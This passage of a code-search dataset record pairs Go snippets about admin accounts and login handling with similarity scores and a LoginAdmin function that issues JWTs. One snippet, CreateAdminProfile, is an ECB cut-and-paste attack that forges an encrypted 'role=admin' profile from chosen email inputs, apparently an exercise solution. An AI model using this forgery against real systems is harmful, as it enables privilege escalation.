new(BindingsNewAdmin)\n\t\t\t\tif err := _Bindings.contract.UnpackLog(event, \"NewAdmin\", log); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tevent.Raw = log\n\n\t\t\t\tselect {\n\t\t\t\tcase sink <- event:\n\t\t\t\tcase err := <-sub.Err():\n\t\t\t\t\treturn err\n\t\t\t\tcase <-quit:\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\tcase err := <-sub.Err():\n\t\t\t\treturn err\n\t\t\tcase <-quit:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}), nil\n}", "func (App) ConfigureAdmin(Admin *admin.Admin) {\n\t// Add Store\n\tstore := Admin.AddResource(&stores.Store{}, &admin.Config{Menu: []string{\"Store Management\"}})\n\tstore.Meta(&admin.Meta{Name: \"Owner\", Type: \"single_edit\"})\n\tstore.AddValidator(&resource.Validator{\n\t\tHandler: func(record interface{}, metaValues *resource.MetaValues, context *qor.Context) error {\n\t\t\tif meta := metaValues.Get(\"Name\"); meta != nil {\n\t\t\t\tif name := utils.ToString(meta.Value); strings.TrimSpace(name) == \"\" {\n\t\t\t\t\treturn validations.NewError(record, \"Name\", \"Name can't be blank\")\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t})\n}", "func (factory) Create(cfg config.NodeHostConfig,\n\tcb config.LogDBCallback, dirs []string, wals []string) (raftio.ILogDB, error) {\n\treturn CreateTan(cfg, cb, dirs, wals)\n}", "func MakeAdminHandler(w http.ResponseWriter, req *http.Request) {\n\n\t// Get session values or redirect to Login\n\tsession, err := sessions.Store.Get(req, \"session\")\n\n\tif err != nil {\n\t\tlog.Println(\"error identifying session\")\n\t\thttp.Redirect(w, req, \"/login/\", 302)\n\t\treturn\n\t\t// in case of error\n\t}\n\n\t// Prep for user authentication\n\tsessionMap := getUserSessionValues(session)\n\n\tisAdmin := sessionMap[\"isAdmin\"]\n\n\tvars := mux.Vars(req)\n\tidString := vars[\"id\"]\n\n\tpk, err := strconv.Atoi(idString)\n\tif err != nil {\n\t\tpk = 0\n\t\tlog.Println(err)\n\t}\n\n\tfmt.Println(session)\n\n\tif isAdmin != \"true\" {\n\t\thttp.Redirect(w, req, \"/\", 302)\n\t\treturn\n\t}\n\n\tuser, err := database.PKLoadUser(db, int64(pk))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t\tfmt.Println(\"Unable to load User\")\n\t\thttp.Redirect(w, req, \"/\", http.StatusSeeOther)\n\t}\n\n\tuser.IsAdmin = true\n\tuser.Role = \"admin\"\n\n\terr = database.UpdateUser(db, user)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\n\turl := \"/user_index/\"\n\n\thttp.Redirect(w, req, url, http.StatusFound)\n}", "func (m *resourceMapper) createAdminAccessCheck(accessCheckParam athenzAccessCheckParam) []webhook.AthenzAccessCheck {\n\taccessChecks := make([]webhook.AthenzAccessCheck, len(accessCheckParam.domains)+1)\n\tfor i, domain := range accessCheckParam.domains {\n\t\taccessChecks[i] = webhook.AthenzAccessCheck{\n\t\t\tResource: m.res.TrimResource(fmt.Sprintf(\"%s:%s.%s.%s.%s\", accessCheckParam.adminDomain, accessCheckParam.group, domain, accessCheckParam.resource, accessCheckParam.name)),\n\t\t\tAction: accessCheckParam.action,\n\t\t}\n\t}\n\taccessChecks[len(accessChecks)-1] = webhook.AthenzAccessCheck{\n\t\tResource: m.res.TrimResource(fmt.Sprintf(\"%s:%s.%s.%s\", accessCheckParam.adminDomain, accessCheckParam.group, accessCheckParam.resource, accessCheckParam.name)),\n\t\tAction: accessCheckParam.action,\n\t}\n\treturn accessChecks\n}", "func NewAdminRouter(client *elastic.Client) *http.ServeMux {\n\tmux := http.NewServeMux()\n\tmux.Handle(\"/metrics\", prometheus.Handler())\n\t// creates /live and /ready endpoints\n\tmux.Handle(\"/\", healthzHandler(client))\n\treturn mux\n}", "func (c *DomainController) Admin(addr sdk.AccAddress) *DomainController {\n\tc.validators = append(c.validators, func(controller *DomainController) error {\n\t\treturn controller.isAdmin(addr)\n\t})\n\treturn c\n}", "func (m *MockedKafkaAdminClient) NewAdminClient(conf *kafka.ConfigMap) (*kafka.AdminClient, error) {\n\targs := m.Called(conf)\n\treturn args.Get(0).(*kafka.AdminClient), args.Error(1)\n}", "func CreateModifyClusterServiceConfigForAdminRequest() (request *ModifyClusterServiceConfigForAdminRequest) {\n\trequest = &ModifyClusterServiceConfigForAdminRequest{\n\t\tRpcRequest: &requests.RpcRequest{},\n\t}\n\trequest.InitWithApiInfo(\"Emr\", \"2016-04-08\", \"ModifyClusterServiceConfigForAdmin\", \"emr\", \"openAPI\")\n\treturn\n}", "func (aaa *RolesService) AdminCreateRoleV3(input *roles.AdminCreateRoleV3Params) (*iamclientmodels.AccountcommonRoleV3, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcreated, badRequest, unauthorized, forbidden, internalServerError, err := aaa.Client.Roles.AdminCreateRoleV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn created.GetPayload(), nil\n}", "func NewAdminRepo( db *mongo.Database ) Admin.AdminRepo {\n\treturn &AdminRepo{\n\t\tDB : db , \n\t}\n}", "func (u *Admin) AfterCreate(scope *gorm.Scope) error {\n\t// Create auth identity\n\tnow := time.Now()\n\n\tauthIdentity := &auth_identity.AuthIdentity{}\n\tauthIdentity.Provider = \"password\"\n\tauthIdentity.UID = u.Email\n\tauthIdentity.EncryptedPassword = u.Password\n\tauthIdentity.UserID = fmt.Sprint(u.ID)\n\tauthIdentity.ConfirmedAt = &now\n\n\tdatabase.Conn.Create(authIdentity)\n\n\treturn nil\n}", "func (rt *RestTester) CreateDatabase(dbName string, config DbConfig) *TestResponse {\n\tdbcJSON, err := base.JSONMarshal(config)\n\trequire.NoError(rt.TB, err)\n\tresp := rt.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/%s/\", dbName), string(dbcJSON))\n\treturn resp\n}", "func (newAdmin *NewAdmin) ToAdmin() (*Admin, error) {\n\n\t// Construct a Admin based on NewAdmin.\n\tadmin := &Admin{\n\t\tID: bson.NewObjectId(),\n\t\tUserName: newAdmin.UserName,\n\t\tFirstName: newAdmin.FirstName,\n\t\tLastName: newAdmin.LastName,\n\t}\n\n\t// Trim leading and trailing whitespace from an email address.\n\temail := strings.TrimSpace(newAdmin.Email)\n\n\t// Force all characters in the email to be lower-case.\n\temail = strings.ToLower(email)\n\n\t// Update Email field.\n\tadmin.Email = email\n\n\t// md5 hash the final email string.\n\th := md5.New()\n\tio.WriteString(h, email)\n\tresult := hex.EncodeToString(h.Sum(nil))\n\n\t// Set the PhotoURL field of the new Admin to\n\t// the Gravatar PhotoURL for the admin's email address.\n\tphotoURL := gravatarBasePhotoURL + result\n\tadmin.PhotoURL = photoURL\n\n\t// Call .SetPassword() to set the PassHash\n\t// field of the Admin to a hash of the NewAdmin.Password.\n\terr := admin.SetPassword(newAdmin.Password)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"error setting password hash of the Admin: %v\", err)\n\t}\n\n\treturn admin, nil\n}", "func CreateAdminProfile(generateEncryptedProfile func(string) (Bytes, error)) (Bytes, error) {\n\tvar email string\n\tvar cipher Bytes\n\tvar err error\n\n\t// Capture 'admin&uid=10&rol'\n\temail = \"[email protected]\"\n\tcipher, err = generateEncryptedProfile(email)\n\tif err != nil {\n\t\treturn Bytes{}, err\n\t}\n\tsuffix := cipher[16:32]\n\n\t// Capture 'email=joe@gmail.' + 'com&uid=10&role='\n\temail = \"[email protected]\" // email=joe@gmail. com&uid=10&role= user\n\tcipher, err = generateEncryptedProfile(email)\n\tif err != nil {\n\t\treturn Bytes{}, err\n\t}\n\tprefix := cipher[:32]\n\n\t// Return admin profile '[email protected]&uid=10&role=admin&uid=10&rol'\n\tadminProfile := append(prefix, suffix...)\n\treturn adminProfile, nil\n}", "func (aaa *NotificationService) CreateNotificationTemplateV1Admin(input *notification.CreateNotificationTemplateV1AdminParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, conflict, err := aaa.Client.Notification.CreateNotificationTemplateV1Admin(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif conflict != nil {\n\t\treturn conflict\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func NewAdminSvc(db *orm.ORM, rdb *redis.Client) AdminService {\n\treturn &ORM{db, rdb}\n}", "func SaveAdmin(admin *model.Admin) error {\n\n\tpassword, err := crypto.AESEncrypt(admin.Password)\n\tif err != nil {\n\t\treturn err\n\t}\n\tadmin.Password = password\n\tif admin.Password == \"\" {\n\t\treturn fmt.Errorf(\"Encrypt failure\")\n\t}\n\treturn db.From(\"admin\").Save(admin)\n\n}", "func validateAdmin(name, password string) error {\n\tif passvault.NumRecords() == 0 {\n\t\treturn errors.New(\"Vault is not created yet\")\n\t}\n\n\tpr, ok := passvault.GetRecord(name)\n\tif !ok {\n\t\treturn errors.New(\"User not present\")\n\t}\n\tif err := pr.ValidatePassword(password); err != nil {\n\t\treturn err\n\t}\n\tif !pr.IsAdmin() {\n\t\treturn errors.New(\"Admin required\")\n\t}\n\n\treturn nil\n}", "func (ctx *ResourceContext) NewAdminRouter() http.Handler {\n\tr := chi.NewRouter()\n\n\tr.Get(infra.WrapNR(\"/heartbeat\", ctx.GetHeartbeat))\n\tr.Get(infra.WrapNR(\"/heartbeat/_stop\", ctx.StopHeartbeat))\n\tr.Get(infra.WrapNR(\"/heartbeat/_start\", ctx.StartHeartbeat))\n\tr.Get(infra.WrapNR(\"/_info\", ctx.GetInfo))\n\tr.Get(infra.WrapNR(\"/_health\", ctx.GetHealth))\n\n\treturn r\n}", "func NewAdminServer(config config.AdminServer, options ...AdminServerOption) *AdminServer {\n\tdefaultWorker, _ := worker.New()\n\tdefaultServer := &http.Server{\n\t\tReadTimeout: 10 * time.Second,\n\t\tAddr: config.ListenURL,\n\t}\n\tdefaultLimiter := ratelimit.NewPostLimiter()\n\tas := &AdminServer{\n\t\tworker: defaultWorker,\n\t\tserver: defaultServer,\n\t\tlimiter: defaultLimiter,\n\t\tconfig: config,\n\t}\n\tfor _, opt := range options {\n\t\topt(as)\n\t}\n\tas.registerRoutes()\n\treturn as\n}", "func (_CommitteeManager *CommitteeManagerTransactor) CreateResetAdminProposal(opts *bind.TransactOpts, newAdmin common.Address, contractAddr common.Address, blockNumberInterval *big.Int) (*types.Transaction, *types.Receipt, error) {\n\treturn _CommitteeManager.contract.Transact(opts, \"createResetAdminProposal\", newAdmin, contractAddr, blockNumberInterval)\n}", "func (c *AdminSessionClient) Create() *AdminSessionCreate {\n\tmutation := newAdminSessionMutation(c.config, OpCreate)\n\treturn &AdminSessionCreate{config: c.config, hooks: c.Hooks(), mutation: mutation}\n}", "func NewAdminInterface(st UserAccountStorage) (AdminInterface, error) {\n\tif st == nil {\n\t\treturn nil, fmt.Errorf(\"error: storage is nil\")\n\t}\n\treturn &admininterface{st, globalHasher}, nil\n}" ]
[ "0.79721355", "0.78507006", "0.78507006", "0.74113077", "0.72893703", "0.7026832", "0.6943034", "0.6858146", "0.67922354", "0.6791772", "0.6783282", "0.66808814", "0.65001017", "0.6499582", "0.6327005", "0.6304981", "0.6218968", "0.61998796", "0.619839", "0.6185348", "0.6180355", "0.61464053", "0.6141212", "0.612163", "0.60655576", "0.60655576", "0.6031108", "0.6004432", "0.59916884", "0.5982338", "0.5972512", "0.5968043", "0.59051186", "0.58527344", "0.57855135", "0.5663551", "0.5655546", "0.5649547", "0.563253", "0.56271714", "0.5606167", "0.5606119", "0.5582508", "0.5582508", "0.5551402", "0.55137944", "0.5487756", "0.5471922", "0.54594487", "0.542054", "0.5403052", "0.5382129", "0.53707826", "0.5363229", "0.53594655", "0.53568506", "0.53486377", "0.5338163", "0.5333422", "0.53306884", "0.5327468", "0.531542", "0.5307533", "0.5306568", "0.5298169", "0.5279834", "0.5256594", "0.5256527", "0.52525824", "0.5248214", "0.5206087", "0.5204317", "0.52024615", "0.5157846", "0.51398224", "0.5137639", "0.51340157", "0.51273024", "0.5120191", "0.51192343", "0.51106304", "0.5109197", "0.5086271", "0.50791574", "0.5074289", "0.50662476", "0.50608027", "0.50432235", "0.50413597", "0.50374883", "0.5037109", "0.5028195", "0.5020481", "0.5019542", "0.50194687", "0.50144345", "0.5013994", "0.501215", "0.50120676", "0.5011769" ]
0.68878734
7
LoginAdmin checks if the email is having valid credentials and returns them a unique, secured token to help them get resources from app
func (orm *ORM) LoginAdmin(ctx context.Context, email string, password string) (*LoginResult, error) { var _Admin models.Admin //check if email is in db _Result := orm.DB.DB.Joins("CreatedBy").First(&_Admin, "admins.email = ?", email) if errors.Is(_Result.Error, gorm.ErrRecordNotFound) { return nil, errors.New("AdminNotFound") } //since email in db, lets validate hash and then send back isSame := validatehash.ValidateCipher(password, _Admin.Password) if isSame == false { return nil, errors.New("PasswordIncorrect") } //sign token token, signTokenErrr := signjwt.SignJWT(jwt.MapClaims{ "id": _Admin.ID, "role": _Admin.Role, }, utils.MustGet("SECRET")) if signTokenErrr != nil { return nil, signTokenErrr } return &LoginResult{ Token: token, Admin: _Admin, }, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func AdminLogin(w http.ResponseWriter, r *http.Request) {\n\n\tbody, err := ioutil.ReadAll(r.Body) // it reads the data for the api asign to the body\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\tuser := models.User{}\n\terr = json.Unmarshal(body, &user) // here the data in body is store at the user's memory address\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\n\tuser.Prepare()\n\terr = user.Validate(\"login\")\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\n\ttoken, err := auth.AdminSignIn(user.Email, user.Password)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\tresponses.JSON(w, http.StatusOK, token)\n}", "func (s *rpcServer) LoginAdmin(ctx context.Context, req *api.LoginAdminRequest) (*api.LoginAdminResponse, error) {\n\tadmin, err := admin.Login(req.Email, req.Password)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcl := auth.New(admin.ID, admin.ACL)\n\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, cl)\n\ttokenStr, err := token.SignedString(s.privKey)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &api.LoginAdminResponse{\n\t\tToken: tokenStr,\n\t\tAdmin: &api.Admin{\n\t\t\tId: admin.ID,\n\t\t\tName: admin.Name,\n\t\t\tEmail: admin.Email,\n\t\t\tACL: admin.ACL,\n\t\t},\n\t}, nil\n}", "func (r *Resolver) LoginAdmin(ctx context.Context, args *struct {\n\tEmail string\n\tPassword string\n}) (*userLoginResolver, error) {\n\t// Auth\n\tif isAuthorized, err := utils.IsAuthorized(ctx, utils.AuthAnonymous); !isAuthorized {\n\t\treturn nil, err\n\t}\n\n\tuser, err := r.UserService.ComparePassword(args.Email, args.Password)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Make sure user is admin\n\tauthLevel := utils.AuthLevel(user.Role)\n\n\tif !utils.AuthAdmin.Authorized(authLevel) {\n\t\treturn nil, fmt.Errorf(\"Invalid access\")\n\t}\n\n\tipAddress := ctx.Value(\"IP\").(string)\n\n\terr = r.UserService.UpdateLogin(user, ipAddress)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Create JWT token\n\texp := time.Now().Add(time.Second * time.Duration(r.TokenTTL)).Unix()\n\ttoken, err := utils.GenerateJWT(exp, r.JWTSecret, user.ID, utils.AuthLevel(user.Role))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &userLoginResolver{token}, nil\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\tlog.Println(\"Login\")\n\tvar dataResource model.RegisterResource\n\tvar token string\n\t// Decode the incoming Login json\n\terr := json.NewDecoder(r.Body).Decode(&dataResource)\n\tif err != nil {\n\t\tcommon.ResponseError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"Invalid Login data\",\n\t\t\thttp.StatusInternalServerError,\n\t\t)\n\t\treturn\n\t}\n\n\terr = dataResource.Validate()\n\tif err != nil {\n\t\tcommon.DisplayAppError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"Invalid data\",\n\t\t\thttp.StatusBadRequest,\n\t\t)\n\t\treturn\n\t}\n\n\tdataStore := common.NewDataStore()\n\tdefer dataStore.Close()\n\tcol := dataStore.Collection(\"users\")\n\tuserStore := store.UserStore{C: col}\n\t// Authenticate the login result\n\tresult, err, status := userStore.Login(dataResource.Email, dataResource.Password)\n\n\tdata := model.ResponseModel{\n\t\tStatusCode: status.V(),\n\t}\n\n\tswitch status {\n\tcase constants.NotActivated:\n\t\tdata.Error = status.T()\n\t\t//if err != nil {\n\t\t//\tdata.Data = constants.NotActivated.T()\n\t\t//\tdata.Error = err.Error()\n\t\t//}\n\t\tbreak\n\tcase constants.NotExitedEmail:\n\t\tdata.Error = status.T()\n\t\t//if err != nil {\n\t\t//\tdata.Data = constants.NotActivated.T()\n\t\t//\tdata.Error = err.Error()\n\t\t//}\n\t\tbreak\n\tcase constants.LoginFail:\n\t\tdata.Error = status.T()\n\t\t//if err != nil {\n\t\t//\tdata.Error = err.Error()\n\t\t//}\n\t\tbreak\n\tcase constants.Successful:\n\t\t// Generate JWT token\n\t\ttoken, err = common.GenerateJWT(result.ID, result.Email, \"member\")\n\t\tif err != nil {\n\t\t\tcommon.DisplayAppError(\n\t\t\t\tw,\n\t\t\t\terr,\n\t\t\t\t\"Eror while generating the access token\",\n\t\t\t\thttp.StatusInternalServerError,\n\t\t\t)\n\t\t\treturn\n\t\t}\n\t\t// Clean-up the hashpassword to eliminate it from response JSON\n\t\tuserData := model.UserLite{\n\t\t\tEmail:result.Email,\n\t\t\tID:result.ID,\n\t\t\tLocation:result.Location,\n\t\t\tRole:result.Role,\n\t\t\tMyUrl:result.MyUrl,\n\t\t\tDescription:result.Description,\n\t\t\tLastName:result.LastName,\n\t\t\tFirstName:result.FirstName,\n\t\t\tActivated:result.Activated,\n\t\t\tAvatar:result.Avatar,\n\t\t\tIDCardUrl:result.IDCardUrl,\n\t\t\tPhoneNumber:result.PhoneNumber,\n\n\t\t}\n\t\tauthUser := model.AuthUserModel{\n\t\t\tUser: userData,\n\t\t\tToken: token,\n\t\t}\n\t\tdata.Data = authUser\n\t\tbreak\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\tj, err := json.Marshal(data)\n\tif err != nil {\n\t\tcommon.DisplayAppError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"An unexpected error has occurred\",\n\t\t\thttp.StatusInternalServerError,\n\t\t)\n\t\treturn\n\t}\n\tw.WriteHeader(http.StatusOK)\n\tw.Write(j)\n}", "func Login(email, password string, vcli *client.VirgilHTTPClient) error {\n\tif email == \"\" {\n\t\tfmt.Println(EmailPrompt)\n\n\t\tscanner := bufio.NewScanner(os.Stdin)\n\t\tscanner.Scan()\n\n\t\temail = strings.TrimSpace(scanner.Text())\n\t}\n\n\tif password == \"\" {\n\t\tpwd, err := gopass.GetPasswdPrompt(PasswordPrompt+\"\\r\\n\", false, os.Stdin, os.Stdout)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tpassword = string(pwd)\n\t}\n\n\treq := &models.LoginRequest{\n\t\tEmail: email,\n\t\tPassword: password,\n\t}\n\n\tsessionToken := models.SessionToken{}\n\n\tfor {\n\t\t_, _, vErr := vcli.Send(http.MethodPost, \"user/login\", req, &sessionToken, nil)\n\t\tif vErr == nil {\n\t\t\tbreak\n\t\t}\n\t\t_, err := CheckRetry(vErr, vcli)\n\t\tif err == ErrEmptyMFACode {\n\t\t\tvar code []byte\n\t\t\tfmt.Printf(\"%s\\n\", TwoFactorCodeDescription)\n\t\t\tcode, err = gopass.GetPasswdPrompt(TwoFactorCodePrompt+\"\\r\\n\", true, os.Stdin, os.Stdout)\n\t\t\treq.Verification = &models.Verification{MFACode: string(code)}\n\t\t}\n\t\tif err == ErrEmailIsNotConfirmed {\n\t\t\tfmt.Printf(\"%s\\n\", ConfirmationCodeDescription)\n\t\t\tcode := ReadConsoleValue(\n\t\t\t\t\"confirmation_code\",\n\t\t\t\tConfirmationCodePrompt,\n\t\t\t)\n\n\t\t\t_, _, vErr = vcli.Send(http.MethodGet, \"user/register/confirm/\"+code, req, nil, nil)\n\t\t\t_, err = CheckRetry(vErr, vcli)\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\theader := http.Header{}\n\theader.Set(\"SessionToken\", sessionToken.Token)\n\tmanagementToken := models.ManagementTokenResponse{}\n\t_, _, vErr := vcli.Send(http.MethodPost, \"management-token\",\n\t\tmodels.ManagementTokenRequest{Name: uuid.New().String()},\n\t\t&managementToken, header)\n\tif vErr != nil {\n\t\treturn errors.New(fmt.Sprintf(\"Authorization failed.\\n\"))\n\t}\n\n\t_, _, vErr = vcli.Send(http.MethodPost, \"user/logout\", nil, nil, header)\n\tif vErr != nil {\n\t\treturn errors.New(fmt.Sprintf(\"Authorization failed.\\n\"))\n\t}\n\n\treturn SaveAccessToken(managementToken.Token)\n}", "func Login(email string, password string) (jwtToken string, err error) {\n\tvar m Message\n\tm.Email = email\n\tm.Password = password\n\tjsonData, err := doTauRequest(2, \"POST\", \"auth/signin/\", &m)\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"Login->%v\", err)\n\t}\n\tvar d struct {\n\t\tToken string `json:\"token\"`\n\t\tTwoFactor bool `json:\"two_factor\"`\n\t}\n\tif err := json.Unmarshal(jsonData, &d); err != nil {\n\t\treturn \"\", fmt.Errorf(\"Login->%v\", err)\n\t}\n\treturn d.Token, nil\n}", "func (t *TauAPI) Login(email string, password string) (jwtToken string, err error) {\n\tjsonPostMsg, _ := json.Marshal(&Message{Email: email, Password: password})\n\tjsonData, err := t.doTauRequest(&TauReq{\n\t\tVersion: 2,\n\t\tMethod: \"POST\",\n\t\tPath: \"auth/signin\",\n\t\tNeedsAuth: false,\n\t\tPostMsg: jsonPostMsg,\n\t})\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"Login->%v\", err)\n\t}\n\tvar d struct {\n\t\tToken string `json:\"token\"`\n\t\tTwoFactor bool `json:\"two_factor\"`\n\t}\n\tif err := json.Unmarshal(jsonData, &d); err != nil {\n\t\treturn \"\", fmt.Errorf(\"Login->%v\", err)\n\t}\n\treturn d.Token, nil\n}", "func (svc *credentialService) Login(ctx context.Context, email, password string) (model.AccessToken, model.RefreshToken, error) {\n\tcred, err := svc.repo.Get(ctx, email)\n\tif err == repo.ErrNotFound {\n\t\t//user not found, cannot login\n\t\treturn model.AccessToken{}, model.RefreshToken{}, service.ErrNotFound\n\t} else if err != nil {\n\t\t//Error 500: unknown error, cannot login\n\t\treturn model.AccessToken{}, model.RefreshToken{}, err\n\t}\n\n\terr = cred.VerifyPassword(password)\n\tif err != nil {\n\t\t//wrong password, cannot login\n\t\treturn model.AccessToken{}, model.RefreshToken{}, err\n\t}\n\n\t//Success, create JWT token\n\treturn cred.GenerateJWT()\n}", "func (tc TeresaClient) Login(email strfmt.Email, password strfmt.Password) (token string, err error) {\n\tparams := auth.NewUserLoginParams()\n\tparams.WithBody(&models.Login{Email: &email, Password: &password})\n\n\tr, err := tc.teresa.Auth.UserLogin(params)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn r.Payload.Token, nil\n}", "func AdminLogin(w http.ResponseWriter, data *AdminLoginData) {\n\trender(tpAdminLogin, w, data)\n\tdata.Flash.Del(\"errors\")\n}", "func Login(response http.ResponseWriter, request *http.Request) {\n\taccount := new(models.Account)\n\terr := utils.ExtractFromRequest(request, account)\n\tif err != nil {\n\t\tlog.Println(\"ERROR: Can't extract account from request\", err)\n\t\thttp.Error(response, \"Error while parsing request body\", 500)\n\t\treturn\n\t}\n\n\taccountFromDb, err := persistence.GetAccountByEmail(account.Payload.Email)\n\tif err != nil {\n\t\tlog.Printf(\"ERROR: Can't get account with email=%s from database: %v\\n\", account.Payload.Email, err)\n\t\thttp.Error(response, \"Error while getting account from database\", 500)\n\t\treturn\n\t}\n\n\tif accountFromDb == nil {\n\t\thttp.Error(response, \"Invalid login\", 401)\n\t\treturn\n\t}\n\n\tpasswordHash, err := account.GetPasswordHash()\n\tif err != nil {\n\t\tlog.Println(\"ERROR: Can't get password hash from account\", err)\n\t\thttp.Error(response, \"Error while creating password hash\", 500)\n\t\treturn\n\t}\n\n\tif passwordHash != accountFromDb.Payload.Password {\n\t\thttp.Error(response, \"Invalid login\", 401)\n\t\treturn\n\t}\n\n\tclaims := claims{\n\t\tEmail: accountFromDb.Payload.Email,\n\t\tStandardClaims: jwt.StandardClaims{\n\t\t\tExpiresAt: 60000,\n\t\t},\n\t}\n\n\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS512, claims)\n\n\ttokenString, err := token.SignedString(secret)\n\tif err != nil {\n\t\tlog.Println(\"ERROR: Can't sign JWT\", err)\n\t\thttp.Error(response, \"Error wile signing JWT\", 500)\n\t\treturn\n\t}\n\n\tresponse.Write([]byte(tokenString))\n}", "func AdminLogin(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminLogin, w, data)\n}", "func Login(email string, password string, tokenFile string) {\n\temail, password = getUserCredentials(email, password)\n\tresp := hitEndpoint(GetTokenURL, email, password)\n\n\treadBody(resp)\n\tprintDebug(resp)\n\n\tif resp.StatusCode == 200 {\n\t\ttoken := jbody.(map[string]interface{})[\"token\"].(string)\n\t\tstoreToken(tokenFile, token)\n\t}\n}", "func Login(c *gin.Context) {\n\tos.Setenv(\"API_SECRET\", \"85ds47\")\n\ttype login struct {\n\t\tEmail string `json:\"email\"`\n\t\tPassword string `json:\"password\"`\n\t}\n\n\tloginParams := login{}\n\tc.ShouldBindJSON(&loginParams)\n\ttype Result struct {\n\t\tEmail string\n\t\tUUID string\n\t\tAccessLevel string\n\t\tPassword string\n\t}\n\tvar user Result\n\tif !db.Table(\"users\").Select(\"email, password, uuid, access_level\").Where(\"email = ?\", loginParams.Email).Scan(&user).RecordNotFound() {\n\t\tif CheckPasswordHash(loginParams.Password, user.Password) {\n\t\t\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, jwt.MapClaims{\n\t\t\t\t\"uuid\": user.UUID,\n\t\t\t\t\"acl\": user.AccessLevel,\n\t\t\t})\n\t\t\ttokenStr, err := token.SignedString([]byte(os.Getenv(\"API_SECRET\")))\n\n\t\t\tif err != nil {\n\t\t\t\tc.JSON(500, err)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tc.JSON(200, tokenStr)\n\t\t\treturn\n\t\t} else {\n\t\t\tc.JSON(http.StatusBadRequest, \"wrong password\")\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tc.JSON(http.StatusBadRequest, \"wrong email\")\n\t\treturn\n\t}\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\tstore, err := pgstore.NewPGStore(os.Getenv(\"PGURL\"), key)\n\tcheck(err)\n\tdefer store.Close()\n\tsession, err := store.Get(r, \"scheduler-session\")\n\tcheck(err)\n\n\tvar domain string\n\tif os.Getenv(\"GO_ENV\") == \"dev\" {\n\t\tdomain = \"http://localhost:3000\"\n\t} else if os.Getenv(\"GO_ENV\") == \"test\" {\n\t\tdomain = \"http://s3-sih-test.s3-website-us-west-1.amazonaws.com\"\n\t} else if os.Getenv(\"GO_ENV\") == \"prod\" {\n\t\tdomain = \"https://schedulingishard.com\"\n\t}\n\t// Limit the sessions to 1 24-hour day\n\tsession.Options.MaxAge = 86400 * 1\n\tsession.Options.Domain = domain // Set to localhost for testing only. prod must be set to \"schedulingishard.com\"\n\tsession.Options.HttpOnly = true\n\n\tcreds := DecodeCredentials(r)\n\t// Authenticate based on incoming http request\n\tif passwordsMatch(r, creds) != true {\n\t\tlog.Printf(\"Bad password for member: %v\", creds.Email)\n\t\tmsg := errorMessage{\n\t\t\tStatus: \"Failed to authenticate\",\n\t\t\tMessage: \"Incorrect username or password\",\n\t\t}\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\t//http.Error(w, \"Incorrect username or password\", http.StatusUnauthorized)\n\t\tjson.NewEncoder(w).Encode(msg)\n\t\treturn\n\t}\n\t// Get the memberID based on the supplied email\n\tmemberID := models.GetMemberID(creds.Email)\n\tmemberName := models.GetMemberName(memberID)\n\tm := memberDetails{\n\t\tStatus: \"OK\",\n\t\tID: memberID,\n\t\tName: memberName,\n\t\tEmail: creds.Email,\n\t}\n\n\t// Respond with the proper content type and the memberID\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.Header().Set(\"X-CSRF-Token\", 